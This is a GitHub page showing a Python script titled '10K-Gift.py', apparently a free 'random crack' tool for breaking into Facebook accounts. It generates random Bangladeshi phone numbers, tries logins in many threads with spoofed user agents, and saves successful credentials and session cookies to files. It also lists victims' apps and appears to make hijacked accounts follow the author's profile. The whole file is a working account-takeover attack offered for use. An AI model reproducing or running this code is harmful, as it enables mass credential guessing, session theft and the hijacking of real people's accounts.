-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy path10K-Gift.py
283 lines (273 loc) Β· 10.6 KB
/
10K-Gift.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
#-------------------------------------------------------------
#Don't Forget To Follow My Github &
#Sent Star This Repositories π
#-------------------------------------------------------------
#10K-Gift-Test-Coding
#!/usr/bin/python3
#-*-coding:utf-8-*-
import os,sys,time,json,random,re,string,platform,base64,uuid
os.system("git pull")
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
try:
import requests
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import mechanize
from requests.exceptions import ConnectionError
except ModuleNotFoundError:
os.system('pip install mechanize requests futures bs4==2 > /dev/null')
os.system('pip install bs4')
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
a = ltx-12
tag = "PM"
else:
a = ltx
tag = "AM"
#-----[Global Functions]-----#
def dynamic(text):
titik = ['. ','.. ','... ','.... ']
for o in titik:
print('\r'+text+o),
sys.stdout.flush();time.sleep(1)
#-----[Colours]-----#
RED = '\033[1;91m' #
WHITE = '\033[1;97m' #
GREEN = '\033[1;32m' #
YELLOW = '\033[1;33m' #
BLUE = '\033[1;34m' #
ORANGE = '\033[1;35m' #
P = '\x1b[1;97m' #
M = '\x1b[1;91m' #
H = '\x1b[1;92m' #
K = '\x1b[1;92m' #
B = '\x1b[1;94m' #
U = '\x1b[1;95m' #
O = '\x1b[1;96m' #
N = '\x1b[0m' #
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
mtd,cp_cpx,cokix=[],[],[]
ugen2=[]
ugen=[]
#-----[App Checker]-----#
def cek_apk(session,coki):
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":coki}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f'\r%s[%s!%s] %sSORRY THERE IS NO ACTIVE APK%s '%(N,M,N,M,N))
else:
print(f'\r[π] %s \x1b[1;95m YOUR ACTIVE APPS :{WHITE}'%(GREEN))
for i in range(len(game)):
print(f"\r[%s%s] %s%s"%(N,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
#else:
#print(f'\r %s[%s!%s] Sorry, Apk check failed invalid cookie'%(N,M,N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":coki}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f'\r%s[%s!%s] %sSORRY THERE IS NO EXPIRED APK%s \n'%(N,M,N,M,N))
else:
print(f'\r[π₯΅] %s \x1b[1;95m YOUR EXPIRED APPS :{WHITE}'%(M))
for i in range(len(game)):
print(f"\r[%s%s] %s%s"%(N,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
else:
print('')
def follow(self, session, coki):
r = BeautifulSoup(session.get('https://mbasic.facebook.com/profile.php?id=100015315258519', {
'cookie': coki }, **('cookies',)).text, 'html.parser')
get = r.find('a', 'Ikuti', **('string',)).get('href')
session.get('https://mbasic.facebook.com' + str(get), {
'cookie': coki }, **('cookies',)).text
#-----[UserAgent]-----#
for xd in range(10000):
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'])
c=' en-us; GT-'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
ugen.append(uaku2)
class jalan:
def __init__(self, z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
#-----[Logo]-----#
logo = ("""
\033[1;91m _____ ___ ______ _____________ ________
\033[1;92m / _/ | / / | / / __ \/ ____/ ____/ | / /_ __/
\033[1;93m / // |/ / |/ / / / / / / __/ / |/ / / /
\033[1;94m _/ // /| / /| / /_/ / /___/ /___/ /| / / /
\033[1;95m/___/_/ |_/_/ |_/\____/\____/_____/_/ |_/ /_/ \033[1;92m
βββββββββββββββββββββββββββββββββββββββββββ
β [β] AUTHOR : MUMIT ISLAM HIMU β
β [β] TOOL : RANDOM CRACK β
β [β] STATUS : FREE β
β [β] GITHUB : MUMIT-404-CYBER β
β [β] FACEBOOK : MUMIT ISLAM β
βββββββββββββββββββββββββββββββββββββββββββ""")
try:
print('\n\n\033[1;33mLOADING ASSET FILES ... \033[0;97m')
v = 5.2
update = ('5.2')
update = ('5.2')
if str(v) in update:
os.system('clear')
else:pass
except:print('\n\033[1;31mNO INTERNET CONNECTION ... \033[0;97m')
def linex():
print('\033[1;37m ββββββββββββββββββββββββββββββββββββββββββ')
def clear():
os.system('clear')
print(logo)
#-----[Loop Menu]-----#
loop = 0
oks = []
cps = []
#-----[Main-Menu]-----#
def mumit_menu():
os.system('clear');print(logo)
print('\033[1;92m [1] RANDOM CRACK')
print('\033[1;92m [0] EXIT TOOL')
linex()
mumit=input(' \033[1;32m[?] SELECT MENU: ')
if mumit in['1','01']:innocent()
elif mumit in['0','00']:exit()
else:exit()
def innocent():
user=[]
twf =[]
os.getuid
os.geteuid
os.system("clear")
print(logo)
print('\033[1;32m [β] BD CODE : 017/019/016/018/013')
linex()
code = input('\033[1;32m [?] CHOOSE : ')
os.system('clear')
print(logo)
print('\033[1;32m [β] EXAMPLE : 3000/5000/10000/50000')
linex()
limit = int(input('\033[1;32m [?] CHOOSE : '))
linex()
xd_cp=input(f'\033[1;32m [?] You Want To Show Cp Account?[\033[1;32mY\033[1;34m/\033[1;31mN\033[1;32m]: ')
if xd_cp in ['y','Y','yes','Yes','1']:cp_cpx.append('y')
else:cp_cpx.append('n')
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(8))
user.append(nmp)
with ThreadPool(max_workers=50) as ahare:
clear()
tl = str(len(user))
print('\033[1;32m [+] Choice Code: '+code)
print('\033[1;92m [+] Crack Process Has Started')
print('\033[1;92m [!] Use Flight Mode For Speed Up')
linex()
for fuck in user:
pwx = [fuck,'bangladesh']
uid = code+fuck
ahare.submit(mumitx,uid,pwx,tl)
print('CRACK PROCESS HAS BEEN COMPLETED ')
print('Ok Ids Saved in /INNOCENT-OK.txt')
print('Cp Ids Saved in /INNOCENT-CP.txt')
linex()
def mumitx(uid,pwx,tl):
global loop
global cps
global oks
global proxy
try:
for ps in pwx:
pro = random.choice(ugen)
session = requests.Session()
free_fb = session.get('https://mbasic.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {'authority': 'm.facebook.com',
'method':'POST',
'path':'/login/device-based/login/async/?refsrc=deprecated&lwv=100',
'scheme':'https',
'accept': '*/*',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
'content-type': 'application/x-www-form-urlencoded',
'origin': 'https://m.facebook.com',
'referer': 'https://m.facebook.com/',
'sec-ch-ua': '"Chromium";v="111", "Not(A:Brand";v="8"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Linux"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'x-asbd-id': '198387',
'x-fb-lsd': 'AVoPmsopEAk',
'user-agent': pro}
lo = session.post('https://m.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[7:22]
print('\r\r\033[1;32m[INNOCENT-OK] ' +uid+ ' | ' +ps+ ' \033[0;97m')
print('\033[1;32m[COOKIE] = \033[1;37m'+coki+ '')
cek_apk(session,coki)
open('/sdcard/INNOCENT-OK.txt', 'a').write( cid+' | '+ps+'\n')
oks.append(cid)
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[24:39]
if 'y' in cp_cpx:
print('\r\r\033[1;30m[INNOCENT-CP] ' +uid+ ' | ' +ps+ ' \033[0;97m')
open('/sdcard/INNOCENT-CP.txt', 'a').write( cid+' | '+ps+' \n')
cps.append(cid)
break
else:
continue
loop+=1
sys.stdout.write('\r\r%s\033[0;97m[\033[0;96mINNOCENT\033[0;97m]..[\033[0;94m%s/%s\033[0;97m]..[\033[0;92mOK\033[0;97m/\033[0;91mCP\033[0;97m]..[\033[0;92m%s\033[0;97m/\033[0;91m%s\033[0;97m] '%(H,loop,tl,len(oks),len(cps))),
sys.stdout.flush()
except:
pass
#-----[Run Menu]-----#
mumit_menu()